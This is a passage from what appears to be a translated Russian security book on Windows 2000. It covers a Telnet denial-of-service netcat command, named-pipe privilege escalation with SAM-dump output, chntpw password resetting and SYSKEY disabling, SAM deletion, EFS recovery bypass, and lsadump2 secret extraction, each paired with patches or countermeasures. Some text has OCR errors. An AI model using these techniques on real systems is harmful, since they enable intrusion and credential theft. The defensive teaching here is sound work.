    Этот параметр отвечает за частоту отправки контрольных пакетов (keep-alive), проверяющих, не разорвано ли соединение, находящееся в режиме ожидания. Если удаленная система все еще достижима и функционирует в нормальном режиме, то она направляет подтверждение. Контрольные пакеты по умолчанию не отправляются. Это свойство можно включить для данного соединения с помощью соответствующего приложения. Данные параметры являются глобальными, т.е. применяются для всех интерфейсов. Их значения могут оказаться слишком малыми для адаптеров, используемых в целях управления или резервирования
    Tcpip\Parameter \Interfaces \ <интерфейс>NoName ReleaseOnDemand
    0 (false)
    Этот параметр определяет, следует ли компьютеру возвращать свое имя NetBIOS в ответ на запрос Name-Release из сети. Значение 0 предотвращает атаки, направленные на получение имени NetBIOS (см. бюллетень Microsoft Security Bulletin MSOO-047). До конца не ясно, к какому результату могут привести подобные атаки при отключении протоколов NetBIOS/SMB/CIFS, как описано выше в этой главе
    Tcpip \ Parameters\Interfaces\ <интерфейс> РеrfоrmRouterDiscovery
    0
    От значения этого параметра зависит, будет ли Windows NT/2000 выполнять поиск маршрутизатора согласно спецификации RFC 1256 для каждого интерфейса в отдельности. Значение 0 предотвращает попытки атак с использованием ложных пакетов от ложных маршрутизаторов. Для определения, какой интерфейс соответствует сетевому адаптеру, можно использовать значение ключа TcpipXParameters \Adapters

    Более подробная информация об этих параметрах и описание параметра SynAttackProtect содержится в статье Q142641 базы знаний компании Microsoft.

    Генерация состояния DoS сервера ч.,, Telnet Win 2000



    Эта простая атака, придуманная в лаборатории SecureXpertLabs (http://www. secure xpert com), предполагает отправку бинарной строки, состоящей из нулей, службе Telnet Microsoft (которая в Win 2000 по умолчанию отключена). Это приводит к выводу службы из строя и автоматическому перезапуску (если таковой предусмотрен). При многократном повторении попыток автоматического перезапуска (когда их число достигает максимально допустимого значения) служба отключается насовсем.
    Эта атака легко реализуется с помощью команды netcat (см. главу Ь) в операционной системе Linux, nc target.host 23 < /dev/zero

    Модуль обновления для сервера Telnet



    Для предотвращения этой атаки необходимо использовать модуль обновления, который можно найти по адресу http://www.microsoft.com/technet/security/ bulletin/MS00-050.asp. Он не включен в сервисный пакет Win 2000 Service Pack 1 и может применяться как до, так и после этого пакета. Сервер Telnet можно сконфигурировать на выполнение автоматической перезагрузки. В этом случае постоянные нападки взломщиков, возможно, по-прежнему будут досаждать, однако теперь их можно отслеживать с помощью маршрутизатора, если поддерживаемый на нем журнал имеет достаточно большой размер и взломщики не используют ложные пакеты.

    Генерация состояния DoS на сервере имен NetBIOS



    В июле 2000 года сэр Дастик (Sir Dystic) из группы хакеров Cult of the Dead Caw ("Кутьт мертвой коровы", http://www.cultdeadcow.com) сообщил о том что отправка сообщения "NetBIOS Name Release" службе имен NetBIOS (NBNS UDP 137) компьютера NT/2000 приводит к конфликту, связанному с этим именем, и невозможности его дальнейшего использования. После получения такого сообщения это имя нельзя использовать в сети NetBIOS. Примерно в это же время из лаборатории Network Associates COVERT Labs (http //www.nai.com) сообщили, что сообщение "NetBIOS Name Conflict можно отправить службе имен NetBIOS даже в том случае, если целевой компьютер не находится в процессе регистрации своего имени NetBIOS. Это тоже приводит к конфликту и невозможности дальнейшего использования имени.
    Сэр Дастик (Sir Dystic) написал программу взлома под названием nbname, с помощью которой можно отправить пакет "NBNS Name Release" всем компьютерам, зарегистрированным в таблице имен NetBIOS, и тоже вызвать аналогичную проблему. Хакеры локальных сетей (NBNS не поддерживает маршрутизацию) считают эту программу достаточно мощным средством реализации атак DoS.

     Контрмеры против атаки DoS на сервер имен NetBIOS



    К сожалению, протокол NetBIOS не документирован, поэтому авторы не могут гарантировать надежность следующего рецепта. Компания Microsoft разработала ключ системного реестра, предотвращающего подтверждение сообщения Name Release со стороны сервера NBNS. Решение проблемы с сообщением "Name Conflict состоит в том что это сообщение обрабатывается только на этапе регистрации. Таким образом, компьютер остается уязвимым только в это время. Соответствующий модуль обновления и более подробная информация содержится по адресу http: //www.microsoft.com/
    technet/security/bulletin/MS00-047.asp
    . Этот модуль обновления не вошел в SP1 и может применяться как до, так и после установки сервисного пакета.
    Более надежное решение, конечно, состоит в отказе от использования службы NetBIOS и, как следствие, полном предотвращении подобного хулиганства. Кроме того, безусловно, необходимо отключить UDP-порт 137 для доступа извне.


    11. Расширение привилегий



    Расширение привилегий


    Если взломщик смог добраться до учетной записи пользователя в системе Windows 2000, то следующим его желанием станет получение исключительных привилегий — прав администратора. К счастью, операционная система Win 2000 является более устойчивой, чем ее предшественницы в смысле противостояния таким попыткам (по крайней мере угрозы типа getadmin и sechole ей теперь не страшны). Но к сожалению, если взломщик смог получить данные интерактивной учетной записи, то предотвратить возможность расширения его привилегий очень сложно (интерактивные учетные записи получили гораздо более широкое распространение с появлением терминального сервера Windows 2000, применяемого в целях удаленного управления и распределенной обработки данных).

    Использование именованных конвейеров для запуска программ с системными привилегиями



    Атака, обеспечивающая расширение привилегий на основе прогнозирования создания именованного канала при инициализации системных служб Windows 2000 (таких как Server, Workstation, Alerter и ClipBook, связанных с учетной записью SYSTEM), была разработана Майком Шифманом (Mike Schiffman) и отправлена в бюллетень Bugtraq (ID 1535). Перед запуском каждой службы на сервере создается именованный канал с прогнозируемой последовательностью имен. Эту последовательность можно получить из параметра системного реестра HKLM\System\CurrentControlSet\Control\ ServiceCurrent.
    Любой интерактивный пользователь Win 2000 (включая удаленных пользователей терминального сервера) может спрогнозировать имя канала, инсталлировать его и таким образом запустить программу с системными привилегиями. Если к этому именованному каналу добавить посторонний код, то он тоже получит системные привилегии и сможет выполнить практически любые действия в локальной системе (например, добавить текущего пользователя в группу администраторов).
    Тестовый код, написанный хакером Мачо (Масео), несколько менее эффективен: он находит пользователя с относительным идентификатором RID 500 (более подробная информация об идентификаторах RID содержится в главе 5), т.е. учетную запись администратора независимо от того, была ли она переименована, и выводит на экран его пароль в зашифрованном виде. Так работает приведенная ниже программа взлома main. Однако сначала покажем, что текущий интерактивный пользователь является членом группы операторов резервного копирования Backup Operators, запустив утилиту whoami.

    C:\>whoami /groups
    [Group 1] = "Everyone"
    [Group 2] = "BUILTIN\Backup Operators"
    [Group 3] = "LOCAL"
    [Group 4] = "NT AUTHORITYMNTERACTIVE"
    [Group 5] = "NT AUTHORITYXAuthenticated Users"
    G:\>main
    The ClipBook service is not started.
    More 'help is available by typing NET HELPMSG 3521.
    Impersonating: SYSTEM Dumping SAM for RID 500 ...
    F:Ox020001000000000000000000000000000000000000COO.
    V:0x00000000a800000002000100a80000001a000000000c4.

    Обратите внимание, что эта программа взлома для выполнения своих губительных действий использует учетную запись SYSTEM. Теперь хакер может взломать пароль администратора и зарегистрироваться в системе. (Напомним, что при наличии системных привилегий это не составляет труда. Гораздо сложнее "пробраться" в группу администраторов.)

    Контрмеры против использования именованных каналов



    Компания Microsoft выпустила модуль обновления, изменяющий способ создания и размещения именованных каналов диспетчером Win 2000 Service Control Manager (SCM). Его можно найти по адресу http://www.microsoft.com/technet/security/ bulletin/MS00-053 .asp. Этот модуль обновления не вошел в сервисный пакет SP1 и может применяться как до, так и после установки этого пакета.
    Привилегии интерактивных учетных записей конечно же необходимо жестко ограничить в любой системе, содержащей конфиденциальные данные, поскольку в противном случае задачи хакера значительно облегчаются. Чтобы проверить права интерактивных учетных записей в системе Windows 2000, запустите аплет Security Policy (либо для локальной политики либо для политики групп), найдите элемент User Rights Assignment в группе Local Policies и ознакомьтесь с тем, как выделяются права при локальной регистрации.
    В Win 2000 появилась новая возможность отменять для некоторых групп или пользователей действие многих привилегий. Например, как видно из рисунка, возможность локальной регистрации отменяется путем выбора политики Deny logon locally.


    По умолчанию группа users и учетная запись Guest обладают правом локальной регистрации в системе Win 2000 Professional и на автономных серверах Win 2000 Server. Права пользователей контроллера домена ограничены более жестко благодаря специальной используемой по умолчанию политике (правами локальной регистрации обладают все группы операторов). Мы рекомендуем отменить это право для группы users и учетной записи Guest и строго следить за тем, кому предоставляются такие привилегии.

     Нарушение доступа к рабочим станциям



    Большинство администраторов Windows никогда не слышали о рабочих станциях в контексте одного из наиболее загадочных разделов программирования для Windows. Модель безопасности Win 2000 определяет иерархию контейнеров, предназначенных для разграничения функций зашиты между различными процессами. В этой иерархии объекты упорядочены от общего к частному: сеанс, рабочая станция, рабочий стол. При этом сеанс содержит одну или несколько рабочих станций, которые, в свою очередь, могут включать один или несколько рабочих столов. В рамках этой концепции сфера действия процессов ограничена рабочей станцией, а потоки одного процесса работают с одним или несколькими рабочими столами. Однако по каким-то причинам эта концепция не была реализована в исходной версии Win 2000. При некоторых условиях процесс с более низкими привилегиями, работающий на одном из рабочих столов, в рамках одного сеанса мог получать информацию от рабочего стола другой рабочей станции.
    Следствием этого явилась возможность для злоумышленников интерактивно зарегистрироваться в системе Win 2000 и взаимодействовать с процессами, работающими в рамках этого же интерактивного сеанса. (Заметим, что при этом нельзя взаимодействовать с другими пользователями терминального сервера, поскольку они работают в отдельных сеансах.) Взломщики также могут создать процесс на другой рабочей станции. Однако до конца не ясно, какие действия они могут предпринять, даже если созданный ими процесс обладает системными привилегиями. Хакеры, как минимум, могут считывать вводимую с клавиатуры и выводимую на экран информацию.

    Контрмеры против нарушения доступа к рабочим станциям



    Поскольку эта проблема связана с некорректной реализацией модели безопасности компанией Microsoft, то и в ее решении придется положиться на модуль обновления этой компании. Такой модуль, обеспечивающий корректное разделение процессов для различных рабочих столов, можно получить по адресу http://www.microsoft.com/technet/
    security/bulletin/ms00-020.asp.
    Кроме того, он вошел в состав сервисного пакета SP1.
    Еще один полезный совет сводится к ограничению привилегий интерактивной учетной записи (см. приведенное выше описание проблемы с именованными каналами).
    Эта проблема наделала много шума и обсуждалась даже в бюллетене NTBugtraq (http://www.ntbugtraq.com), однако она не принесла никакого вреда, хотя основные трудности, возможно, еще впереди. Следует отметить, правда, что к моменту выхода в свет этой книги ни о каких новых проблемах речь не шла. Все же советуем читателям периодически обращаться к Web-узлу компании Microsoft, посвященному вопросам безопасности.


    2.gif

    Изображение: 

    12. Несанкционированное получение данных



    Несанкционированное получение данных


    После получения статуса администратора взломщики обычно стараются получить всю информацию, которую можно будет использовать для последующих вторжений.


    13. Получение хэш-кодов паролей Win 2000



    Получение хэш-кодов паролей Win 2000


    Хакеры будут счастливы узнать, что хэш-коды диспетчера локальной сети LanManager (LM) хранится в предлагаемом по умолчанию местоположении Win 2000 для обеспечения совместимости с клиентами других версий (отличными от Windows NT/2000). Это приводит к проблемам, описанным в главе 5, для устранения которых можно использовать предложенные там же решения. Однако, к небольшому разочарованию хакеров, благодаря некоторым новым свойствам Win 2000 и, в первую очередь, алгоритму шифрования SYSKEY, стандартные приемы взлома паролей теперь неприменимы. Однако, как будет видно из следующих разделов, не все обстоит так благополучно.

     Получение базы данных SAM



    На контроллерах доменов Win 2000 хэш-коды паролей хранятся в файле службы каталогов Active Directory (%windir%\NTDS\ntds .dit). При стандартной конфигурации этот файл занимает порядка 10 Мбайт и хранится в зашифрованном виде, поэтому взломщики вряд ли смогут заполучить его с целью последующего анализа.
    Однако интерес для хакеров может представлять файл диспетчера учетных записей защиты SAM (Security Account Manager), содержащийся на компьютерах, не выступающих в роли контроллеров домена. Получение данных этого файла в операционной системе NT 4 не составляло большого труда. Местоположение файла SAM в новой версии операционной системы по прежнему определяется параметром %systemroot%\system32\config, а доступ к файлу блокируется операционной системой. Поэтому получение данных путем загрузки в режиме DOS по-прежнему возможно даже при использовании пятой версии файловой системы NTFS. Для реализации этой задачи можно воспользоваться утилитой NTFSDOS, расположенной по адресу http://www.sysinternals.com/. Местоположение резервной копии файла SAM определяется параметром %systemroot%\repair (этот файл называется SAM, а не ЗАМ._, как в NT 4). В ней содержится информация обо всех пользователях системы на момент ее установки. В приложение Microsoft Backup v.5 (файл ntbackup.exe) интегрирована утилита rdisk, поэтому с его помощью можно создать аварийный диск. При выборе команды Create Emergency Repair Disk открывается диалоговое окно, в котором нужно указать, следует ли копировать системный реестр в резервный каталог, как показано ниже.
    При выборе этого режима весь системный реестр, включая улей SAM, копируется в папку %windir%\ repair\RegBack. Члены группы Users обладают правом чтения информации из этой папки, а члены группы Power Users — правом ее модификации, если диск отформатирован для использования файловой системы NTFS. Следовательно, только члены группы Power Users имеют расширенный доступ к этому файлу, а не все пользователи. Атаки, направленные на получение резервной копии файла SAM, также несколько осложняются тем, что этот файл зашифрован с использованием нового алгоритма шифрования SYSKEY, а на сегодняшний день механизм расшифровки таких файлов (отличный от pwdump2) неизвестен.


    Фаил SAM в Win 2000 по умолчанию кодируется с использованием SYSKEY и восстанавливается с помощью средства pwdump2.

    Не забывайте очищать каталог Repair \RegBack



    Не оставляйте взломщикам никаких шансов — переносите файлы каталога Repair\RegBack на съемный диск или в другое безопасное место. А еще лучше — при запуске утилиты создания диска аварийного восстановления не выбирайте опцию архивации системного реестра.

    Загрузка хэш-кодов чо, с с помощью pwdump2



    В операционной системе Win 2000 по умолчанию применяется кодировка SYSKEY (более подробная информация об этом содержится в разделе Q143475 базы знаний и в главе 5). Поэтому с помощью средства pwdump нельзя корректно расшифровать хэш-коды паролей из системного реестра Win 2000. Для решения этой задачи надо использовать pwdump2 (более подробно о pwdump, pwdump2, а также о том, почему для расшифровки SYSKEY не подходит pwdump, читайте в главе 5). Более того, для локальной загрузки хэш-кодов с контроллера домена требуется обновленная версия утилиты pwdump2 (доступная по адресу http://razor.bindview.com), поскольку теперь хранение паролей организовано на базе Active Directory, а не в соответствии с традиционными принципами файла SAM.

    Контрмеры против загрузки хэш-кодов с помощью pwdump2



    Поскольку принципы подключения динамических библиотек в Windows не изменились, то против утилиты pwdump2 не существует никакой зашиты. Слабым утешением служит лишь тот факт, что эта утилита работает локально и для ее запуска требуются привилегии администратора. Если же хакеру удалось получить эти привилегии, то он сможет получить практически любую информацию о локальной системе (другой вопрос, как можно использовать данные SAM для новых атак).

    Добавление хэш-кодов в файл SAM с помощью chntpw



    Если хакер получил физический доступ к системе и у него достаточно времени для загрузки другой операционной системы, то он может реализовать сложную атаку, описанную Питером Нордалом-Хагеном (Fetter Nordahl-Hagen). В ряде статей, содержащихся на этом узле, Питер приводит поразительные факты. Например, по его словам, хэш-коды паролей можно добавить в файл SAM в автономном режиме и таким образом изменить пароль любого пользователя системы.
    Но это еще не все! Далее Питер предлагает программу изменения паролей в операционной системе NT chntpw, а также загрузочную дискету с операционной системой Linux, которую можно использовать для входа в систему NT/2000, изменения пароля администратора (даже если он был переименован), перезагрузки системы и регистрации в ней с новым паролем.
    Дальше больше, Питер утверждает, что этот метод работает даже при использовании шифрования SYSKEY и даже в режиме защиты ключа SYSKEY паролем или его хранения на гибком диске.
    "Минуточку ,— возразит читатель, — средство SYSKEY использует второй, 128-разрядный тип шифрования паролей на основе уникального ключа, который можно хранить в реестре, защитить паролем или записать на гибкий диск (см. главу 5). Как же можно изменить пароль, не зная системного ключа для его создания?"
    Для таких читателей Питер рассказывает, как отключить режим SYSKEY. Более того, он обнаружил, что взломщику это не понадобится: при добавлении в файл SAM хэш-кодов старого образца (не использующих кодировку SYSKEY) они автоматически кодируются с помощью ключа SYSKEY после перезагрузки системы. Такой глубокий анализ достоин восхищения. Браво Питеру!
    Питер отключает SYSKEY следующим образом (хотя можно этого и не делать).
    1. Устанавливает для параметра HKLM\System\CurrentControlSet\Control\LsaXSecureBoot значение 0 (этот параметр может принимать следующие значения: 0 — системный ключ отключен, 1 — ключ хранится в реестре в открытом виде, 2 — ключ хранится в реестре и защищен паролем, 3 — ключ хранится на гибком диске).
    2. Сбрасывает соответствующий флаг в бинарной структуре HKLM\SAM\Domains\AccountXF. Этот параметр недоступен в процессе работы операционной системы.
    3. В Win 2000 задает для параметра HKLM\security\Policy\PolSecretEncryption Key\<default> значение 0.
    Питер утверждает, что изменение значения лишь одного из двух первых параметров в операционной системе NT 4 даже при наличии сервисных пакетов вплоть до SP6 приводит к появлению предупреждения о несовместимости файла SAM с системными параметрами при завершении загрузки и повторному включению ключа SYSKEY. В Win 2000 в случае несовместимости значений трех перечисленных параметров сразу же выполняется перезагрузка и значение параметров изменяется на наиболее типичное.

    Применение этих приемов может привести к повреждению файла SAM. Испытывайте их только на тестовых компьютерах с системой NT/2000 и будьте готовы к возможному отказу операционной системы. В частности, не выбирайте опцию Disable SYSKEY программы chntpw в Win 2000. По отзывам, это может привести к непредсказуемым результатам и даже необходимости полной переустановки системы. Описанный выше прием не позволяет изменять пароли пользователей на контроллере домена Win 2000, а относится лишь к изменению файлов SAM. Напомним, что на контроллере домена хэш-коды паролей хранятся в Active Directory, а не в файле SAM.

    Контрмеры против chntpw



    Если хакеры могут получить неограниченный физический доступ к системе, то противостоять им практически невозможно. Одна из слабых контрмер состоит в такой настройке параметров, при которой требуется привлечение ключа SYSKEY при каждой загрузке. Этого можно добиться, установив режим защиты системного ключа паролем или хранения его на гибком диске (в главе 5 описаны три модели использования ключа SYSKEY). Тогда даже после изменения пароля администратора для загрузки системы хакер должен будет ввести пароль SYSKEY. Конечно же, с помощью программы chntpw хакер может полностью отключить системный ключ, но тогда он рискует вывести из строя операционную систему, если это Win 2000.
    С помощью готовой программы chntpw можно лишь полностью отключить SYSKEY. Спрашивается, а что если параметр SecureBoot будет принимать значение 1, а не 0, для локального хранения системного ключа? Это значение позволит отключить защиту SYSKEY паролем и режим его хранения на гибком диске, сводя на нет эти контрмеры. Исходный код программы chntpw можно найти на узле Питера. Можно также воспользоваться существующей утилитой chntpw в режиме редактирования реестра.
    В условиях отсутствия надежной защиты ключа SYSKEY необходимо полагаться на традиционные методы защиты, такие как обеспечение физической безопасности важных систем, установки паролей на BIOS или отключения режима загрузки системы с гибкого диска.

    Удаление пароля администратора, вместе с файлом SAM



    25 июля 1999 года Джеймс Дж. Ерейс (James J. Grace) и Томас С.В. Бартлетт III (Thomas S. V. Bartlett III) опубликовали потрясающую статью о том, как удалить пароль администратора, загрузившись в другой операционной системе и удалив файл SAM http://www.deepquest.pf. Имея неограниченный физический доступ к компьютеру и средства для записи информации в разделы NTFS (например, утилиту NTFSDOS Pro, доступную по адресу http://www.sysinternals.com), с помощью этого средства можно легко обойти всю локальную систему зашиты NT/2000.
    Хотя описанная в статье процедура предполагает установку второй копии операционной системы NT или 2000 наряду с исходной, это требование не является обязательным, если взломщик преследует лишь цель удаления пароля учетной записи администратора. Можно просто удалить файл SAM.
    Эта атака может иметь серьезные последствия при использовании шифрования файловой системы, описанные в следующем разделе.

    Контроллеры доменов Win 2000 не пострадают от удаления файла SAM, поскольку на этих машинах хэш-коды паролей хранятся в Active Directory. Однако в указанной статье приводится механизм достижения аналогичного результата на контроллере домена, предполагающий установку второй копии Win 2000.

    Предотвращение удаления файла SAM



    Как отмечалось выше на уровне операционной системы существует единственный способ противостояния такой атаке. он заключается в защите паролем системного ключа или установке режима его хранения на гибком диске. Еще один эффективный способ противодействия атакам в автономном режиме- обеспечить физическую защищенность серверов, отключив режим загрузки со съемных носителей или установив пароль BIOS. Авторы советуют использовать все эти механизмы.


    3.gif

    Изображение: 

    14. Шифрование файловой системы



    Шифрование файловой системы


    Одним из главных достижений Win 2000 в области безопасности является шифрование файловой системы. Средство EPS (Encrypting File System) — это система шифрования на основе открытого ключа, предназначенная для кодирования данных на диске в реальном времени и предотвращения несанкционированного доступа к ним. Компания Microsoft опубликовала статью, описывающую детали функционирования EPS (http://www.microsoft.com/windows200/
    library/howitworks/security/encrypt.asp
    ). Система EFS позволяет закодировать файл или папку с помощью быстрого симметричного алгоритма шифрования на основе случайно сгенерированного ключа FEK (File Encryption Key) специально для этого файла или папки. В качестве алгоритма шифрования в исходной версии системы EFS используется расширенный стандарт шифрования данных DESX . Случайно сгенерированный ключ для шифрования файла сам, в свою очередь, кодируется с помощью одного или нескольких открытых ключей, включая ключ пользователя (в Win 2000 каждый пользователь получает пару ключей — открытый и закрытый) и агент восстановления ключа. Эти зашифрованные значения хранятся как атрибуты файла.
    Процедура восстановления ключа применяется для восстановления информации в том случае, если сотрудник, зашифровавший данные, больше не работает в организации, а его ключ утерян. Чтобы обеспечить возможность восстановления зашифрованных данных в Win 2000 существует агент восстановления данных EFS. Без агента восстановления система EFS не работает. Поскольку ключ шифрования файла абсолютно не зависит от пары ключей пользователя, агент восстановления может дешифровать содержимое файла, не раскрывая закрытого ключа пользователя. По умолчанию агентом восстановления данных в системе служит локальная учетная запись администратора.
    Хотя шифрование файловой системы во многих случаях может оказаться полезным, его не стоит применять для защиты данных разных пользователей одной рабочей станции друг от друга. Для защиты данных от других пользователей существуют списки управления доступом (ACL — Access Control List) файловой системы NTFS. Компания Microsoft рассматривает систему EFS как средство защиты от атак, направленных на получение данных в обход операционной системы (путем загрузки через другую операционную систему или использования средств доступа к жесткому диску от сторонних производителей), или для зашиты файлов, расположенных на удаленных серверах. В статье компании Microsoft, посвященной системе EFS. говорится буквально следующее: "Система EFS служит для обеспечения защиты информации от доступа из других операционных систем, т.е. от физического доступа к файлам раздела NTFS без соответствующих прав". Далее будет показано, насколько это утверждение соответствует истине.

    Применение EFS



    Систему EFS можно применять для шифрования любого файла или папки. Эту операцию можно выполнить в диалоговом окне свойств объекта с помощью кнопки Advanced во вкладке General. Кроме того, для шифрования и дешифрования файлов можно использовать утилиту командной строки cipher. Для получения справочной информации об этой программе введите команду cipher /?.
    Хотя файлы можно шифровать и по отдельности, компания Microsoft рекомендует делать это на уровне папок, поскольку отдельно зашифрованные файлы могут подвергаться разнообразным манипуляциям или случайно оказаться расшифрованными. Кроме того, зашифрованные файлы не подлежат сжатию.
    Для обеспечения наиболее рационального шифрования файловой системы авторы советуют прислушаться к рекомендациям по использованию EFS, приведенным в упомянутой выше статье компании Microsoft.

    Будьте внимательны при перемещении зашифрованных файлов. Хотя при использовании стандартных механизмов резервного копирования (например, ntbackup.exe) зашифрованные файлы копируются без модификации, при выполнении обычной операции копирования файлы расшифровываются. Если файл копируется в раздел с файловой системой, отличной от NTFS 5.0, то после копирования файлы окажутся расшифрованными. При копировании файла на удаленный компьютер с файловой системой NTFS 5.0 он будет зашифрован, однако не будет идентичен оригиналу, поскольку удаленная копия будет зашифрована с помощью другого ключа. Таким образом, шифрование файловой системы защищает файлы только при хранении на диске, а при перемещении файлов они расшифровываются.

    Расшифровка ключа агента  восстановления EFS



    Продолжим начатое ранее обсуждение статьи Джеймса Дж. Грейса (James J. Grace) и Томаса С.В. Бартлетта III (Thomas S. V. Bartlett III). Возможность изменения пароля учетной записи администратора может иметь гораздо более серьезные последствия, если учесть, что учетная запись Administrator по умолчанию является агентом восстановления ключа. Если зарегистрироваться в системе с пустым паролем администратора, то все зашифрованные системой EFS файлы будут декодированы, поскольку администратор может получить доступ к ключу кодирования файлов (а значит, и содержимому этих файлов) с помощью своего ключа восстановления.
    Почему это происходит? Напомним, как работает система EFS. Случайно сгенерированный ключ шифрования файла РЕК сам кодируется с помощью других ключей, и это зашифрованное значение хранится в качестве атрибута файла. Ключ РЕК, зашифрованный с помощью открытого ключа пользователя (каждый пользователь системы Win 2000 имеет пару ключей: закрытый и открытый), хранится в атрибуте DDF (Data Decipher Field). При доступе к файлу атрибут DDF расшифровывается закрытым ключом, и с помощью декодированного ключа РЕК расшифровывается сам файл. Значение, полученное после расшифровки ключа РЕК с помощью ключа агента восстановления, хранится в атрибуте DRF (Data Recovery Field). Поэтому, если локальная учетная запись администратора является агентом восстановления (а по умолчанию это так), то любой человек с правами администратора в данной системе может декодировать значение атрибута DRF своим закрытым ключом, получить ключ РЕК и расшифровать файл.

    Делегирование прав агента восстановления не решает проблему



    На первый взгляд может показаться, что проблему легко решить, делегировав права агента восстановления другой учетной записи. На самом деле это не так. Джеймс Дж. Грейс (James J. Grace) и Томас С.В. Бартлетт III (Thomas S. V. Bartlett III) разработали средство для изменения пароля любой учетной записи, определенной как агент восстановления.
    Конечно же, хакеров не интересует сам агент восстановления. Просто это самый простой способ доступа к любому файлу на диске, зашифрованному системой EFS. Еще один способ борьбы с делегированием прав агента восстановления — просто "представиться" пользователем, зашифровавшим файл. Утилита chntpw (см. выше) позволяет изменить пароль любой учетной записи в автономном режиме. Затем взломщик может зарегистрироваться в системе как нужный ему пользователь и декодировать значение атрибута DDF с помощью своего закрытого ключа, расшифровав таким образом ключ FEK. и сам файл. При этом закрытый ключ агента восстановления данных не понадобится.

    Экспортирование ключей восстановления и их безопасное хранение



    В ответ на статью Джеймса Дж. Грейса (James J. Grace) и Томаса С.В. Бартлетта III (Thomas S. V. Bartlett III) компания Microsoft признала, что таким способом действительно можно обойти систему EFS, но в свое оправдание заявила, что для предотвращения этой атаки нужно правильно хранить ключ восстановления EFS (http://www. microsoft.com/technet/security/analefs.asp).
    К сожалению, приведенное по этому адресу описание процесса экспортирования устарело, а в файлах справки по EFS другой способ не приводится. Чтобы экспортировать сертификат агента восстановления на отдельный компьютер, откройте аплет задания групповой политики Group Policy (gpedit.msc), найдите элемент Computer ConfigurationWVindows Settings\Security Settings\Public Key PoliciesVEncrypted Data Recovery Agents и выберите из контекстного меню агента восстановления на правой панели команду All Tasks>Export.


    Запустится мастер, после выполнения рекомендаций которого ключ восстановления будет экспортирован. Для резервного копирования ключа агента восстановления вместе с сертификатом необходимо экспортировать и закрытый ключ. При этом авторы рекомендуют использовать защиту паролем.
    И наконец, не забудьте удалить закрытый ключ, выбрав опцию Delete The Private Key If export Is Successful. После этого заполучить ключ к агенту восстановления из локальной системы будет крайне сложно (авторы просто избегают употреблять слово "невозможно"):

    Напомним, что при простом удалении сертификата агента восстановления из правой панели шифрование файловой системы станет невозможным. На следующем рисунке показано, что происходит при попытке шифрования без агента восстановления — система не работает.


    Файлы, зашифрованные до удаления агента восстановления, остаются зашифрованными, но могут быть открыты только соответствующим пользователем или после восстановления агента из резервной копии.

    Для узлов, входящих в домен, ситуация отличается. Ключи восстановления всех систем, входящих в домен, хранятся на его контроллере. При добавлении к домену компьютера под управлением Win 2000 автоматически вступает в силу используемая по умолчанию политика восстановления домена и агентом восстановления становится администратор домена, а не локальный администратор. Таким образом, ключи восстановления физически отделяются от зашифрованных данных, что значительно затрудняет описанную атаку. Не мешает также экспортировать сертификат агента восстановления с контроллера домена, поскольку при их получении уязвимыми станут все компьютеры данного домена.

    Компания Microsoft в ответном документе также утверждает, что возможность удаления файла SAM, приводящую к установке пароля администратора в NULL, можно предотвратить с помощью ключа SYSKEY. Но выше было показано, что это не так, если не выбран режим его защиты паролем или хранения на гибком диске (в статье об этом умалчивается).


    4.gif

    Изображение: 

    5.gif

    Изображение: 

    15. Вторжение на доверительную территорию



    Вторжение на доверительную территорию


    Один из основных приемов взломщиков — поиск данных пользователей домена (а не локальной системы). Это позволяет хакерам получить доступ к контроллеру домена и легко обмануть систему безопасности домена. Такой деятельности обычно невольно способствуют администраторы, которые регистрируются на локальной машине с использованием данных учетной записи домена. Система Win 2000 не может предостеречь своих пользователей от очевидных ошибок.

    Средства получения данных LSA -живут и здравствуют



    Как было показано в главе 5, получение данных LSA — основной механизм для вгпома доверительных отношений, поскольку позволяет получить данные о нескольких последних зарегистрированных в системе пользователях и пароли учетных записей служб.
    Хотя компания Microsoft объявила об устранении ошибок, связанных с получением данных LSA, в сервисном пакете SP3, многие из этих важных данных можно получить с помощью обновленной утилиты Isadump2 Тодда Сабина (Todd Sabin) . Приведем пример извлечения с помощью lsadump2 данных учетной записи службы на контроллере домена Win 2000. Последняя запись свидетельствует о том, что служба BckpSvr регистрируется с паролем password1234.

    С:\>lsadump2
    $MACHINE.ACC
    7D 58 DA 95 69 3E 3E 9E AC Cl B8 09 Fi Oc C4 9E } X.. i»...
    6A BE DA 2D F7 94 B4 90 B2 39 D7 77 j ..-...9.w
    TemServLiceningSignKey-12d4b7c8-77d5-lld1-8c24-OOc04fa3080d
    TS:InternetConnectorPswd
    36 00 36 00 2В 00 32 00 48 00 68 О0 32 0O 62 00 6.6.+.2.H.h.i.b.2
    44 00 55 00 41 00 44 00 47 00 50 00 ОС О0 D.U.D.G.P....
    SC_BckpSrv
    74 00 65 00 73 00 74 00 75 00 73 00 65 00 72 00 p. a. s. s.w.o. r .d.
    31 00 32 00 33 00 34 00 1.2.3.4.


    Зная пароль службы, взломщик может использовать утилиты (например, встроенную net user или nltest/TRUSTED_DOMAINS из набора Resource Kit) для изучения учетных записей пользователей и доверительных отношений в этой системе (что легко реализуется с помощью привилегий администратора). Такое исследование скорее всего приведет к выявлению пользователя bckp (или ему подобного) и доверительных отношений с внешними доменами. Попытка зарегистрироваться в этих доменах с помощью bckp/passwordl234, по всей вероятности, окажется успешной.

    Контрмеры против Isadump2



    Компания Microsoft считает, что описанная ситуация не представляет угрозы для безопасности системы, поскольку для запуска утилиты Isadump2 требуется привилегия seoebugprivilege, делегируемая по умолчанию только администраторам. Лучший способ противостояния lsadump2 - защитить учетные записи администраторов. Если же хакер получит доступ к учетной записи администратора, то с помощью lsaduir.P2 он сможет получить и учетные записи служб внешних доменов, и с этим ничего не поделаешь.

    Новая система множественной репликации и модель доверительных отношений


    Одним из наиболее значительных отличий Win 2000 от NT в области архитектуры доменов является переход к системе множественной репликации и модели доверительных отношений. В рамках леса Win 2000 все домены хранят реплики совместно используемой службы Active Directory и строят двухсторонние доверительные отношения друг с другом по транзитивному принципу на базе протокола Kerberos (доверительные отношения между лесами доменов или с доменами нижнего уровня NT 4 по-прежнему остаются односторонними). Это приводит к интересным следствиям при разработке топологии доменов.
    Первым порывом многих администраторов доменов является попытка создания отдельного леса для каждого объекта защиты в рамках организации. На самом деле это неверный подход. Главной задачей администраторов должна стать консолидация доменов в рамках единой схемы управления. Более тонкое управление доступом можно поддерживать на уровне отдельных объектов леса. Возможности такого управления настолько широки, что многие администраторы приходят в замешательство от обилия имеющихся вариантов разрешений. В решении задачи большую помощь могут оказать контейнеры каталогов OL (Organizational Units) и новое средство делегирования прав (delegation feature).
